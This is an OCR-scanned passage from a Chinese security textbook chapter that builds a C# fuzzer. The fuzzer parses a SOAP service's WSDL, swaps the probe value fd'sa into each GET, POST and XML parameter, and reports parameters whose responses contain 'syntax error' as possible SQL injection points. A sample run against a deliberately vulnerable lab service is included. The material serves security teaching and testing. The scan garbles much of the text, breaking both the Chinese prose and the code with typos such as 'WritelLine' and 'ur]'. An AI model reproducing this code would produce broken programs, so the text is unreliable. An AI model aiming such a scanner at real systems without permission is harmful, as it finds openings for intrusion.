XmlDocument Load () 方法 @ 将 HTTP 请 求 返 回 的 XML 加载 到 XML 文档 中 。 然 后 ， 将 生成 的 XML 文档 传递 给 WSDL 类 构造 六 
数 以 创建 一 个 新 的 WSDL 对 象 。 现 在 可 以 所 历 每 个 ?OAP 终 端 服 务 并 对 服务 进行 模糊 测试 。 一 个 foreach 循 环 轴 历 WSDL 类 
services 属 性 中 的 对 象 ， 并 将 每 个 服务 传递 给 我 们 将 在 下 一 节 中 编写 的 FuzzService () 方法 。 


3.3.1 “对 不 同 的 SOAP 服 务 进 行 模 糊 测 试 


FuzzService () 方法 使 用 SoapService 作 为 参数 ， 然 后 确定 是 否 需要 使 用 SOAP 或 HTTP 参 数 来 对 服务 进行 模糊 测试 ， 如 清 
单 3-23 所 示 。 


清单 3-23: 用 于 确定 如 何 对 给 定 SoapService 进 行 模糊 测试 的 FuzzService () 方法 


static void FuzzService(SoapService service) 


{ 


Console.WritelLine("Fuzzing service: ”+ service.Name); 


foreach (SoapPort port in service.Ports) 


Console.WriteLine("Fuzzing ”+ port.ElementType.Split(':')[0|] + ”port: ”+ port.Name); 
SoapBinding binding = wsdl.Bindings.@Single(b => b.Name == port.Binding.Split(":")[1]); 


if (binding.@IsHTTP) 
FuzzHttpPort(binding); 
else 
FuzzSoapPort (binding); 


打印 将 会 进行 模糊 测试 的 当前 服务 后 ， 我 们 遍历 Ports 服 务 属性 中 的 每 个 SOAP 端 口 。 使 用 语言 集成 查询 (Language- 
Integrated Query，LINQ) Single () 方法 @， 我 们 选择 一 个 对 应 于 当前 新 口 的 SoapBinding。 然 后 测试 绑 定 是 HTTP 还 是 基于 
XML 的 SOAP。 如 果 是 HTTP 绑 定 @@， 我 们 将 其 传递 给 FuzzHttpPort () 方法 来 进行 模糊 测试 。 否 则 假设 绑 定 是 SOAP 绑 定 ， 并 
将 其 传递 给 FuzzSoapPort () 万 法 。 


现在 实现 FuzzHttpPort () 方法 。 当 你 处 理 SOAP 时 ， 两 种 可 能 的 HTTP 端 口 是 GET 和 POST。FuzzHttpPort () 方法 确定 
在 模糊 测试 期 间 友 送 HTTP 请 求 时 将 使 用 哪个 HTTP 动 词 ， 如 清单 3-24 所 示 。 


清单 3-24: FuzzHttpPort () 方法 


static void FuzzHttpPort(SoapBinding binding) 


if (binding.Verb == "GET") 
FuzzHttpGetPort(binding); 

else if (binding.Verb == "POST") 
FuzzHttpPostPort(binding); 


else 
throw new Exception("Don't know verb: ”+ binding.Verb); 


FuzzHttpPort () 方法 非常 简单 。 它 测试 SoapBinding Verb 属 性 是 否 等 于 GET 或 POST， 然 后 分 别 将 绑 定 传递 给 适当 的 方 


FuzzHttpGetPort () 或 FuzzHttpPostPort () 。 如 果 Verb 属 性 不 等 于 GET 或 POST， 则 抛 出 异常 以 提醒 用 户 我 们 不 知 


法 
道 如 何 处 理 给 定 的 HTTP 动 词 。 

现在 创建 了 FuzzHttpPort () 方法 ， 我 们 将 实现 FuzzHttpGetPort () 方法 。 

创建 要 进行 模糊 测试 的 URL 

这 两 个 HTTP 模 糊 测试 的 方法 比 先前 的 模糊 测试 工具 中 的 方法 要 复杂 一 些 。 清 单 3-25 所 示 的 FuzzHttpGetPort () 方法 的 前 
半 部 分 构建 了 要 进行 模糊 测试 的 初始 URL。 


清单 3-25: FuzzHttpGetPort () 方法 的 前 半 部 分 : 构建 要 进行 模糊 测试 的 URL 


static void FuzzHttpGetPort(SoapBinding binding ) 


SoapPortType portType = wsdl.PortTypes.@Single(pt => pt.Name == binding.Type.9plLit( : )[1]); 

foreach (SoapBindingOperation op in binding.Operations) 

| Console.WriteLine("Fuzzing operation: 
string url = @ endpoint + op.Location,; 
SoapOperation po = portType.Operations.Single(p => p.Name == op.Name); 
SoapMessage input = wsdl.Messages.Single(m => m.Name == po.Input.Split(':")[1]); 
Dictionary<string, string> parameters = new Dictionary<string, string>(); 


+ 0p.Name ) ; 


foreach (SoapMessagePart part in input.Parts) 
parameters.Add(part.Name, part.Type); 


bool @first = true; 
List<Guid> guidList = new List<Guid>(); 
foreach (var param in parameters) 


if (param.Value.EndsWith("string")) 


Guid guid = Guid.NewGuid(); 

guidList.Add(guid); 

ur] @+= (first ?©@ "?" : "&") + param.Key + "=" + guid.ToString(); 
} 


first = false; 


我 们 在 FuzzHttpGetPort () 方法 中 做 的 第 一 件 事 是 使 用 INQ@ 从 我 们 的 WSDL 类 中 选择 与 当前 SOAP 绑 定 相对 应 的 端口 类 


型 。 然 后 迭代 当前 绑 定 的 Operations 属 性 ， 其 中 包含 有 关 我 们 可 以 调用 的 每 个 操作 以 及 如 何 调用 给 定 操作 的 信息 。 人 在 迭代 时 ， 
我 们 打印 将 要 进行 模糊 测试 的 操作 。 然 后 ， 我 们 将 创建 一 个 URL 用 于 通过 将 当前 操作 的 Location 属 性 附加 到 Main () 方法 @ 中 


开始 时 设置 的 endpoint 变 量 来 为 给 定 操作 友 出 HTTP 请 求 。 使 用 LINQ 方 法 Single () 从 PortType 的 Operations 属 性 选择 当前 
的 SoapOperation (不 要 与 SoapBindingOperation 混 消 ) 。 我 们 还 使 用 相同 的 HLNQ 方 法 选择 SoapMessage 用 作 当 责 操 作 的 输 
入 ， 马 告诉 我 们 调用 当前 操作 时 期 望 的 信息 。 


获得 了 需要 设置 GET URL 的 信息 之 后 ， 创 建 一 个 字典 来 保 仓 HTTP 参数 名 称 和 我 们 要 友 送 的 参数 类 型 。 使 用 foreach 循 环 和 迭 
代 每 个 输入 部 分 。 迭 代 时 添加 每 个 参数 的 名 称 和 类 型 ， 在 这 种 情况 下 ， 它 们 对 字典 来 说 将 始终 是 字符 串 。 在 拥有 了 上 所 有 参数 名 称 
和 各 自 的 类 型 之 后 ， 我 们 就 可 以 创建 要 进行 模糊 测试 的 URL 了 。 


自 先 ， 定 义 一 个 名 为 first 的 布尔 值 @， 我 们 将 用 它 来 确定 附加 到 操作 URL 的 参数 是 否 是 第 一 个 参数 。 这 很 重要 ， 因 为 第 一 个 
查询 字符 串 参 数 始 终 通过 一 个 问号 (? ) 与 根 URL 分 开 ， 后 续 参数 用 & 行 号 分 阳 ， 因 此 我 们 需要 明日 这 个 区 别 。 然 后 ,创建 一 个 
Guid 列 表 ， 它 将 保存 与 参数 一 起 友 送 的 唯一 值 以 便 我 们 可 以 在 FuzzHttpGetPort () 方法 的 后 半 部 分 中 使 用 它们 。 


接 下 来 ， 使 用 foreach 循 环 轴 历 parameters 字 典 。 在 这 个 foreach 循 环 中 ， 测 试 当 前 参数 的 类 型 是 否 是 字符 串 。 如 果 是 字符 
串 ， 则 创建 一 个 新 的 Guid 用 作 参 数 的 值 ， 然 后 将 新 的 Guid 添 加 到 我 们 创建 的 列表 中 ， 以 便 稍 后 使 用 。 然 后 使 用 + = 运算 符 @@ 将 参 
数 和 新 值 附加 到 当前 URL。 我 们 使 用 三 目 运算 符 @ 确 定 是 否 应 该 使 用 ?或 & 作 为 参数 的 前 缀 。 这 是 HTTP 查 询 字符 串 参 数 根据 
HTTP 协 议 必须 定义 的 方式 。 如 果 当 前 参数 是 第 一 个 参数 ， 则 前 面 加 上 一 个 问号 。 否 则 ， 在 它 前 面 加 上 一 个 & 符 号 。 最 后 ， 将 参 
数 设 置 为 false， 以 便 后 面 的 参数 加 上 正确 的 分 隔 符 作为 前 缀 。 


对 创建 的 URL 进 行 模糊 测试 


在 使 用 查询 字符 串 参 数 创建 URL 之 后 ， 我 们 可 以 友 出 HTTP 请 求 ， 同 时 系统 地 将 参数 值 替 换 为 可 能 从 服务 器 引起 SQL 错 误 的 
改变 过 的 值 ， 如 清单 3-26 所 示 。 代 码 的 后 半 部 分 完成 了 FuzzHttpGetPort () 方法 。 


清单 3-26: FuzzHttpGetPort () 方法 的 后 半 部 分 ， 发 送 HTTP 请 求 


Console.WriteLine("Fuzzing full url: ”+ url); 
int K = 0s 

foreach(Guid guid in guidList) 

{ 


string testUrl = url.@Replace(guid.ToString(), "fd'sa"); 
HttpWebRequest req = (HttpWebRequest)WebRequest.Create(testUr]); 
string resp = string.Empty; 

try 

{ 


using (StreamReader rdr = new @StreamReader(req.GetResponse().GetResponseStream())) 
resp = rdr.ReadToEnd(); 


@catch (WebException ex) 
{ 


using (StreamReader rdr = new StreamReader(ex.Response.GetResponseStream())) 
resp = rdr.ReadToEnd(); 


if (resp.Contains("syntax error")) 
Console.WriteLine("Possible SQL injection vector in parameter: " + input.@Parts[k].Name); 
} 


K++; 


现在 我 们 有 了 要 进行 模糊 测试 的 完整 的 URL， 打 印 它 供用 户 查看 。 我 们 还 声明 了 一 个 整数 k， 它 会 在 我 们 迭代 URL 中 的 参数 
值 时 递增 以 跟踪 潜在 的 存在 漏洞 的 参数 。 然 后 ， 使 用 foreach 循 环 ， 迭 代用 作 参 数值 的 Guid 列 表 。 在 foreach 循 环 中 ， 首 先 使 用 
Replace () 方法 @ 将 URL 中 的 当前 Guid 蔡 换 为 字符 串 “fd'sa” ， 这 将 引发 使 用 该 值 而 没有 正确 过 滤 的 SQL 查询 产生 错误 。 然 
后 ， 我 们 使 用 修改 过 的 URL 创 建 一 个 新 的 HTTP 请 求 ， 并 声明 一 个 名 为 resp 的 空 字符 串 来 保存 HTTP 响 应 。 


在 tryWcatch 块 中 ， 我 们 尝试 使 用 StreamReader@) 从 服务 器 读 取 HTTP 请 求 的 响应 。 如 果 服 务 器 返回 500 错 误 ， 读 取 响 应 将 
导致 异常 (如 果 服 务 器 端 发 生 9QL 异 常 就 会 导致 这 种 情况 ) 。 如 果 抛 出 异常 ， 我 们 会 捕获 catch 块 @ 中 的 异常 并 党 试 再 次 从 服务 
器 读 取 响 应 。 如 果 响 应 包含 字符 串 syntax error， 我 们 将 打印 一 条 消息 ， 提 醒 用 户 当前 的 HTTP 参 数 可 能 容易 受到 SQL 注入 的 攻 
击 。 为 了 准确 地 告诉 用 户 是 哪个 参数 ， 我 们 使 用 整数 k 作 为 Parts 列 表 @ 索 引 并 检索 当前 属性 的 Name。 完 成 之 后 ， 将 整数 k 递 增 
1， 并 返回 到 foreach 循 环 的 开头 以 使 用 一 个 新 的 值 进行 测试 。 


这 瓯 是 对 HTTP GET SOAP 疹 口 进行 模糊 测试 的 完整 方法 。 接 下 来 ， 我 们 需要 实现 FuzzHttpPostPort () 来 对 POST SOAP 
闹 口 进行 模糊 测试 。 


3.3.2” 对 SOAP HTTP POST 端口 进行 模糊 测试 


为 给 定 的 SOAP 服 务 的 HTTP POST SOAP 端 口 进 行 模糊 测试 和 对 GET SOAP 端 口 进行 模糊 测试 类 似 。 唯 一 的 区 别 是 数据 作为 
HTTP POST 参数 而 不 是 查询 字符 串 参数 发 送 。 当 将 HTTP POST 端口 的 goapBinding 传 递 给 FuzzHttpPostPort () 方法 时 ， 我 
们 需要 人 遍历 每 个 操作 ， 并 系统 地 改变 将 发 送 到 操作 的 值 来 引发 Web 服 务 器 的 SQL 错误 。 清 单 3-27 显 示 了 FuzzHttpPostPort () 
方法 的 前 半 部 分 。 


清单 3-27: 确定 FuzzHttpPostPort () 方法 中 要 模糊 测试 的 操作 和 参数 


static void FuzzHttpPostPort(SoapBinding binding) 


@So0apPortType portType = wsdl.PortTypes.Single(pt => pt.Name == binding.Type.Split(":")[1]); 
foreach (SoapBindingOperation op in binding.Operations) 


Console.WritelLine("Fuzzing operation: 
string url = endpoint + op.Location; 
@SoapOperation po = portType.Operations.Single(p => p.Name == op.Name); 
SoapMessage input = wsdl.Messages.Single(m => m.Name == po.Input.Split(':")[1]); 
Dictionary<string, string> parameters = new @Dictionary<string, string>(); 


+ op.Name); 


foreach (SoapMessagePart part in input.Parts) 
parameters.Add(part.Name, part.Type); 


首先 选择 对 应 于 传递 给 该 方法 的 SoapBinding 的 SoapPortType@。 然 后 ， 使 用 foreach 循 环 遍 历 每 个 
soapBindingOperation 来 确定 当前 的 SoapBinding。 当 我 们 遍历 时 打印 一 个 消息 ， 指 定 当前 正在 进行 模糊 测试 的 操作 ， 然 后 构 
建 URL 发 送 模糊 测试 的 数据 。 我 们 还 为 portType 变 量 选 择 相应 的 SoapOperation@O) 以 便 可 以 找到 我 们 需要 的 SoapMessage， 其 
中 包含 我 们 需要 发 送 给 Web 服 务 器 的 HTTP 参 数 。 一 旦 拥有 构建 SOAP 服 务 所 需 的 所 有 信息 ， 并 且 对 SOAP 服 务 进行 了 有 效 的 请 
求 ， 我 们 将 构建 一 个 包含 参数 名 称 及 其 类 型 的 小 型 字典 @， 以 便 以 后 欠 代 。 


现在 我 们 可 以 构建 发 送 给 SOAP 服 务 的 HTTP 参 数 ， 如 清单 3-28 所 示 。 继 续 将 代码 输入 到 FuzzHttpPostPort () 方法 。 
清单 3-28: 构建 要 发 送 到 POST HTTP SOAP 端 口 的 POST 参数 


string postParams = string.Empty; 
bool first = true; 

List<Guid> guids = new List<Guid>(); 
foreach (var param in parameters) 


{ 
if (param.Value.@EndsWith("string")) 


L 
Guid guid = Guid.NewGuid(); 
postParams += (first @? "" : "&") + param.Key + 
guids.Add(guid); 


+ guid.ToString(); 


if (first) 
first = @false; 


我 们 现在 拥有 构建 POST 请 求 所 需 的 所 有 数据 。 声 明 一 个 字符 串 来 保 仔 POST 参数 ， 并 且 声 明 一 个 布尔 值 ， 用 来 确定 该 参数 
是 否 应 该 加 上 & 前 绥 以 拉 述 POST 参 数 。 我 们 还 声明 了 一 个 Guid 列 表 存 储 添加 到 HTTP 参 数 中 的 值 以 便 稍 后 使 用 。 


现在 我 们 可 以 使 用 foreach 循 环 遍 历 每 个 HTTP 参 数 并 构建 将 在 POST 请 求 体 中 发 送 的 参数 字符 串 。 在 迭代 时 ， 我 们 检查 参数 
类 型 是 否 以 string 结 束 @@。 如 果 是 这 样 ， 则 为 参数 值 创 建 一 个 字符 串 。 要 跟踪 我 们 使 用 的 字符 串 值 并 确保 每 个 值 是 唯一 的 ， 我 们 
创建 一 个 新 的 Guid 并 将 其 用 作 参 数 的 值 。 我 们 使 用 三 元 组 操作 @ 确 定 是 否 应 该 使 用 & 符 号 来 给 参数 加 上 前 缀 。 然 后 将 Guid 人 存储 
在 Guid 列 表 中 。 一 旦 将 参数 和 值 附 加 到 POST 参数 字符 串 中 ， 我 们 检查 布尔 值 ， 如 果 为 true， 则 将 其 设置 为 falseG@， 以 便 后 面 的 
POST 参数 使 用 & 符 号 作为 前 缀 。 


接 下 来 ， 需 要 将 POST 参数 友 送 到 服务 器 ， 然 后 读 取 啊 应 并 检查 是 否 有 任何 错误 ， 如 清单 3-29 所 示 。 


清单 3-29: 将 POST 参数 上 友 大 到 SOAP 服 务 并 检查 服务 器 错误 


int k = 0; 
foreach (Guid guid in guids ) 
{ 


string testParams = postParams.@Replace(guid.ToString(), "fd'sa"); 
byte[ | data = System.Text.Encoding.ASCIIT.GetBytes(testParams); 


HttpWebRequest req = @(HttpWebRequest) WebRequest.Create(ur]); 
req.Method = POST ; 

req.ContentType = "application/x-www-form-urlencoded",; 
req.ContentLength = data.Length; 
req.GetRequestStream().@Write(data, 0, data.Length); 


string resp = string.Empty; 
try 
{ 
using (StreamReader rdr = new StreamReader(req.GetResponse().GetResponseStream())) 
resp = rdr.@ReadToEnd(); 
} catch (WebException ex) 
' 
Using (StreamReader rdr = new StreamReader(ex.Response.GetResponseStream())) 
resp = rdr.ReadToEnd(); 


if (resp.@Contains("syntax error")) 
Console.WritelLine("Possible SOL injection vector in parameter: 
} 


K++; 
} 
} 


+ input.Parts[k].Name); 


开始 我 们 声明 一 个 整数 kK， 它 将 在 整个 模糊 测试 的 过 程 中 被 递增 和 使 用 ， 以 跟踪 潜在 的 存在 漏洞 的 参数 ， 并 且 将 k 值 赋值 为 
0。 然 后 我 们 使 用 foreach 循 环 遇 历 Guid 列 表 。 迭 代 时 和 首先 使 用 Replace () 万 法 @ 疹 换 当 前 的 Guid 为 改变 过 的 值 以 创建 一 个 新 
的 POST 参数 字符 串 。 因 为 每 个 Guid 都 是 唯一 的 ， 当 我 们 更 换 Guid 时 ， 它 只 会 改变 一 个 参数 的 值 。 这 使 得 我 们 可 以 确定 哪个 参 
数 具有 潜在 的 漏洞 。 接 下 来 ， 友 送 POST 请 求 并 读 取 响 应 。 


一 旦 将 新 的 POST 参数 字符 串 发 送 到 SOAP 服 务 ， 我 们 使 用 GetBytes () 方法 将 被 写 入 HTTP 流 的 字符 串 转 换 为 字 节 数 组 。 然 
后 ， 构 建 HttpWebRequest@ 将 字 节 发 送 到 服务 器 ， 并 将 HttpWebRedquest 的 Method 属 性 设置 为 “POST”， 将 ContentType 
属性 设置 为 application/x-www-form-urlencoded， 将 ContentLength 属 性 设置 为 字 节 数组 的 大 小 。 一 旦 完成 构建 ， 我 们 通过 
传递 字 节 数组 (开始 写 入 的 数组 的 索引 从 (0) 开始) 和 写 入 Write () @ 方 法 的 字 书 数 将 字 忆 数组 写 入 请 求 流 。 


在 将 POST 参 数 写 入 请 求 流 之 后 ， 我 们 需要 从 服务 器 读 取 啊 应 。 在 声明 一 个 空 字 符 串 来 保存 HTTP 响 应 后 ， 使 用 一 个 
try/catch 块 来 捕获 读 取 HTTP 响 应 流 时 抛 出 的 任何 异常 。 在 using 语 句 的 上 下 文中 创建 StreamReader， 尝 试 使 用 
ReadToEnd () 万 法 @ 读 取 整 个 响应 ， 并 将 响应 分 配给 空 字符 串 。 如 果 服 务 器 返回 的 HTTP 代 码 为 50x (这 意味 着 在 服务 器 站 友 
生 错 误 ) ， 我 们 将 捕获 异常 ， 尝 试 再 次 读 取 咽 应 ， 并 将 响应 字符 串 重 新 分 配给 空 字符 串 以 进行 更 新 。 如 果 咽 应 包含 syntax 
errorG@ 则 打印 一 条 消息 提醒 用 户 当 前 的 HTTP 人 参数 可 能 容易 受到 9QL 注 入 的 攻击 。 要 确定 哪个 参数 是 易 受 攻击 的 ， 可 使 用 整数 K 
作为 参数 列表 的 索引 来 获取 当前 参数 的 Name。 最 后 ， 将 K 整 数 递 增 1， 以 便 在 下 一 次 欠 代 中 引用 下 一 个 参数 ， 之 后 再 次 为 下 一 个 
POST 参数 开始 该 过 程 。 


现在 完成 了 FuzzHttpGetPort () 和 FuzzHttpPostPort () 方法 。 接 下 来 ， 我 们 将 编写 Fuzz-SoapPort () 方法 来 对 
SOAP XML 疹 口 进行 模糊 测试 。 


3.3.3 ”对 SOAP XML 端口 进行 模糊 测试 


为 了 对 SOAP XML 端口 进行 模糊 测试 ， 我 们 需要 动态 构建 XML 以 发 送 到 服务 器 ， 这 比 构建 在 GET 或 POST 请 求 中 发 送 的 
HTTP 参 数 难 一 些 。 但 是 ，FuzzSoapPort () 方法 与 FuzzHttpGetPort () 和 FuzzHttpPostPort () 在 开始 部 分 类 似 ， 如 清单 
3-30 所 示 。 


清单 3-30: 收集 初始 信息 以 构建 动态 SOAP XML 


static void FuzzSoapPort(SoapBinding binding) 


{ 
SoapPortType portType = wsdl.PortTypes.Single(pt => pt.Name == binding.Type.Split("':"')[1]); 


foreach (SoapBindingOperation op in binding.Operations) 


{ 
Console. @Writeline("Fuzzing operation: ”+ op.Name); 
SoapOperation po = portType.Operations.Single(p => p.Name == op.Name); 
SoapMessage input = wsdl.Messages.Single(m => m.Name == po.Input.Split("':")[1]); 


与 对 GET 和 POST 进 行 模糊 测试 的 方法 一 样 ， 在 做 其 他 事情 之 前 我 们 需要 收集 一 些 关 于 将 要 进行 模糊 测试 的 对 象 的 信息 。 首 
先 使 用 LINQ 从 wsdl.PortTypes 属 性 中 获取 相应 的 SoapPortType， 然 后 用 foreach 循 环 遍历 每 个 操作 。 在 迭代 时 ， 我 们 将 正在 
进行 模糊 测试 的 当前 操作 打印 到 控制 台 @。 为 了 将 正确 的 XML 友 送 到 服务 器 ， 我 们 需要 选择 对 应 于 传递 给 该 方法 的 
SoapBinding 类 的 SoapOperation 类 和 SoapMessage 类 。 使 用 Soap-Operation 类 和 SoapMessage 类 ， 可 以 动态 构建 所 需 的 
XML。 为 此 ， 我 们 使 用 LINQ to XML， 它 是 System.Xml.Ling 命 名 空间 中 的 一 组 内 置 类 ， 可 以 创建 简单 的 动态 XML， 如 清单 3- 
31 所 示 。 


清单 3-31: 在 SOAP 模 糊 测试 工具 中 使 用 LINQ to XML 构 建 动态 SOAP XML 


XNamespace soapNS = "http://schemas.xmlsoap.org/soap/envelope/"; 
XNamespace xmlNS = op.@SoapAction.Replace(op.Name, string.Empty); 
XElement soapBody = new XElement(soapNS + "Body"); 

XElement soapOperation = new @XElement(xmlNS + op.Name); 


soapBody .Add(soapOperation); 


List<Guid> paramList = new List<Guid>(); 
SoapType type = wsdl.Types.@Single(t => t.Name == input.Parts[0|].Element.Split(':")[1]); 
foreach (SoapTypeParameter param in type.Parameters) 
{ 
XElement soapParam = new @XElement(xmlNS + param.Name); 
if (param.Type.EndsWith("string")) 
{ 


Guid guid = Guid.NewGuid(); 

paramList.Add(guid); 

soapParam. ©@SetValue(guid.ToString()); 
} 


soapOperation.Add( soapParam); 


} 


首先 在 构建 XML 时 创建 两 个 XNameSpace 实 例 。 第 一 个 XNameSpace 是 默认 的 SOAP 命 名 空间 ， 但 第 二 个 XNameSpace 将 
根据 当前 操作 的 SoapAction 属 性 @ 而 改变 。 在 命名 空间 被 定义 之 后 ， 使 用 XElement 类 创建 两 个 新 的 XML 元 率 。 第 一 个 
XElement (将 被 称 为 <Body> ) 是 SOAP 中 使 用 的 标准 XML 元 素 ， 并 将 封装 当前 SOAP 操 作 的 数据 。 第 二 个 XElement 将 以 当前 
操作 命名 @。XElement 实 例 分 别 使 用 默认 的 SOAP 命 名 空间 和 SOAP 操 作 命名 空间 。 然 后 ， 使 用 XElement Add () 方法 将 第 二 
个 XElement 添 加 到 第 一 个 XElement， 使 得 SOAP<Body>XML 元 素 包含 SOAP 操 作 元 素 。 


创建 外 部 XML 元 素 后 ， 我 们 创建 一 个 Guid 列 表 来 存 储 生 成 的 值 ， 并 且 使 用 LINQG@ 选 择 当 前 的 SoapType， 以 便 我 们 可 以 志 
历 SOAP 调 用 所 需 的 参数 。 在 迭代 时 ， 为 当前 的 参数 @ 创 建 一 个 新 的 XElement。 如 果 参 数 类 型 是 字符 串 ， 则 使 用 
SetValue () 加 为 XElement 指 定 一 个 Guid， 并 将 Guid 和 存储 在 我 们 创建 的 Guid 列 表 中 ， 以 供 以 后 引用 。 然 后 ， 将 XElement 添 加 
到 SOAP 操 作 元 素 ， 并 转 到 下 一 个 参数 。 


一 旦 完成 了 将 参数 添加 到 SOAP 操 作 XML 节 点 ， 我 们 需要 将 整个 SOAP XML 文档 放 在 一 起 ， 如 清单 3-32 所 示 。 
清单 3-32: 将 整个 SOAP XML 文 档 放 在 一 起 


XDocument soapDoc = new XDocument(new XDeclaration("1.0", "ascii", "true"), 
new @XElement(soapNS + "Envelope", 
new XAttribute(XNamespace.Xmlns + "soap", soapNS), 
new XAttribute("xmlns", xmlNS), 
@soapBody ) ) ; 


我 们 需要 使 用 一 个 称 为 SOAP Envelope@ 的 XElement 创 建 一 个 XDocument。 可 以 通过 传递 一 个 新 的 XElement 到 
XDocument 构 造 水 数 来 创建 一 个 新 的 XDocument。XElement 和 几 个 定义 节点 的 XML 命 名 空间 的 属性 以 及 使 用 参数 构建 的 
SOAP 主 体 @ 依 次 创建 。 


现在 XML 已 被 构建 ， 我 们 可 以 将 XML 上 友 送 到 Web 服 务 器 并 尝试 引 友 SQL 错误 ， 如 清单 3-33 所 示 。 继 续 把 代码 添加 到 
FuzzSoapPort () 方法 。 


清单 3-33: 创建 HttpWebRequest 将 SOAP XML 发 送 到 SOAP 终 端 


int kK = 0 
foreach (Guid parm in paramList) 
{ 


string testSoap = soapDoc.ToString().@Replace(parm.ToString(), "fd'sa"); 
byte[ |] data = System.Text.Encoding.ASCII.GetBytes(testSoap); 
HttpWebRequest req = (HttpWebRequest) WebRequest.Create( endpoint); 
req.Headers["SOAPAction"| = @op.SoapAction; 
req.Method = “POST ; 
req.ContentType = “text/xm] ; 
req.ContentLength = data.Length ; 
using (Stream stream = req.GetRequestStream()) 

stream. @Write(data, 0, data.Length); 


与 本 章 前 面 介 绍 的 模糊 测试 工具 一 样 ， 在 为 SOAP 操 作 构建 XML 时 ， 应 在 我 们 创建 的 值 列 表 中 迭代 每 个 Guid。 人 迭代 时 将 
SOAP XML 中 的 当前 Guid 蔡 换 为 在 不 安全 的 情况 下 用 于 SQL 查 询 中 应 该 引 友 SQL 错 误 的 值 。 在 将 Guid 蔡 换 @ 为 改变 的 值 后 ,我 
们 将 使 用 GetBytes () 方法 将 生成 的 字符 串 转 换 为 字 节 数组 ， 这 将 作为 POST 数据 写 入 HTTP 流 。 


然后 构建 HttpWebRequest， 我 们 将 使 用 它 来 进行 HTTP 请 求 并 读 取 结果 。 要 注意 的 一 个 特别 的 部 分 是 SOAPAction 头 @。 
该 SOAPAction HTTP 头 将 被 SOAP 终 端 使 用 以 确定 对 数据 执行 的 操作 ， 例 如 列 出 或 删除 用 户 。 将 HTTP 方 法 设置 为 POST， 将 内 
容 类 型 设置 为 text/xml， 将 内 容 长 度 设置 为 我 们 创建 的 字 节 数组 的 长 度 。 最 后 ， 将 数据 写 入 HTTP 流 @。 现 在 需要 读 取 服务 器 的 


响应 ， 并 确定 发 送 的 数据 是 否 会 导 怪 任何 SQL 错 误 ， 如 清单 3-34 所 示 。 
清单 3-34: 读 取 SOAP 模 糊 测 试 工具 中 的 HTTP 流 并 查找 错误 


string resp = string.Empty; 
try 


using (StreamReader rdr = new StreamReader(req.GetResponse().GetResponseStream())) 
resp = rdr.@ReadToEnd(); 


catch (WebException ex) 
{ 


using (StreamReader rdr = new StreamReader(ex.Response.GetResponseStream())) 
resp = rdr.ReadToEnd(); 


if (resp.@Contains("syntax error")) 
Console.WriteLine("Possible SOL injection vector in parameter: "); 
Console.Write(type.Parameters[k].Name ) ; 


} 


K++; 
} 
} 
} 


清单 3-34 使 用 与 清单 3-26 和 清单 3-29 中 的 模糊 测试 工具 几乎 相同 的 代码 来 检查 SQL 错误 ， 但 在 本 例 中 ， 我 们 将 以 不 同 的 方 
式 处 理 检 测 到 的 错误 。 首 先 ， 声 明 一 个 字符 捉 来 保 仓 HTTP 响 应 并 开始 一 个 try/catch 块 。 然 后 ， 在 using 语 句 的 上 下 文中 使 用 
stream-Reader 莹 试 读 取 HTTP 响 应 的 内 容 并 将 啊 应 存储 在 字符 串 中 四 。 如 果 因 为 HTTP 服 务 器 返回 了 一 个 50x 错 误 引 发 异 弟 ， 则 
捕获 异 单 并 过 试 再 次 读 取 啊 应 。 如 果 抛 出 异 弟 并 且 啊 应 数据 包 合 syntax error@OD， 则 打印 一 条 消息 以 提醒 用 户 有 关 可 能 的 SQL 注 
入 和 潜在 的 存在 漏洞 的 参数 的 名 称 。 最 后 ， 递 增 k 值 并 转 到 下 一 个 参数 。 


3.3.4” 运 行 模糊 测试 工具 


现在 可 以 针对 易 受 攻击 的 SOAP 服 务 程序 CsharpVulnSoap 运 行 模 糊 测试 工具 。 模 糊 测 试 工具 接收 一 个 参数 : 易 受 攻击 的 
SOAP 终 端的 URL。 这 里 我 们 使 用 http://192.168.1.15/Vulnerable.asmx。 传 递 URL 作 为 第 一 个 参数 并 运行 模糊 测试 工具 应 该 产 
生 与 清单 3-35 相 似 的 输出 。 


清单 3-35: 对 CsharpVulnSoap 应 用 程序 运行 SOAP 模 糊 测试 工具 的 部 分 输出 


$ mono ch3 soap fuzzer.exe http://192.168.1.15/Vulnerable.asmx 
Fetching the WSDL for service: http://192.168.1.15/Vulnerable.asmx 
Fetched and loaded the web service description. 

Fuzzing service: VulnerableService 

Fuzzing soap port: @VulnerableServiceSoap 

Fuzzing operation: AddUser 

Possible SQL injection vector in parameter: username 

Possible SQL injection vector in parameter: password 

--SNnip-- 

Fuzzing http port: @VulnerableServiceHttpGet 

Fuzzing operation: AddUser 

Fuzzing full url: http://192.168.1.15/Vulnerable.asmx/AddUser?username=a7ee0684- 
fd54-41b4-b644-20b3dd8be97a&password=85303f3d-1a68-4469-bc69-478504166314 
Possible SQL injection vector in parameter: username 

Possible SQL injection vector in parameter: password 

Fuzzing operation: ListUsers 

Fuzzing full url: http://192.168.1.15/Vulnerable.asmx/ListUsers 
--SNn1ip-- 

Fuzzing http port: @VulnerableServiceHttpPost 

Fuzzing operation: AddUser 

Possible SQL injection vector in parameter: username 

Possible SQL injection vector in parameter: password 

Fuzzing operation: ListUsers 

Fuzzing operation: GetUser 

Possible SQL injection vector in parameter: username 

Fuzzing operation: DeleteUser 

Possible SQL injection vector in parameter: username 


从 输出 中 我 们 可 以 看 到 模糊 测试 的 各 个 阶段 。 从 VulnerableserviceSoap 端 口 @ 开 始 ， 我 们 发 现 AddUser 操 作 可 能 在 传递 给 
操作 的 username 和 password 字 段 中 容易 受到 SQL 注入 的 攻击 。 接 下 来 是 VulnerableServiceHttpGet 痛 口 @。 我 们 对 同样 的 
AddUser 操 作 进 行 模糊 测试 并 打印 我 们 构建 的 URL， 可 以 将 其 粘贴 到 Web 浏 览 器 中 以 查看 成 功 调 用 的 响应 是 什么 。 同 样 ， 友 现 
username 和 password 参 数 可 能 容易 受到 SQL 注 入 的 攻击 。 最 后 ， 我 们 对 VulnerableServiceHttpPost SOAP 闹 口 @ 进 行 模糊 测 
试 ， 首 先 对 AddUser 操 作 进 行 模糊 测试 ， 结 果 与 以 前 的 端口 相同 。ListUsers 操 作 没 有 潜在 的 SQL 注 入 ， 这 是 合理 的 ， 因 为 它 一 
开始 就 没有 参数 。GetUser 和 DeleteUser 操 作 都 可 能 在 username 参 数 中 容易 受到 SQL 注 入 的 攻击 。 


3.4 ”本 瘟 小结 


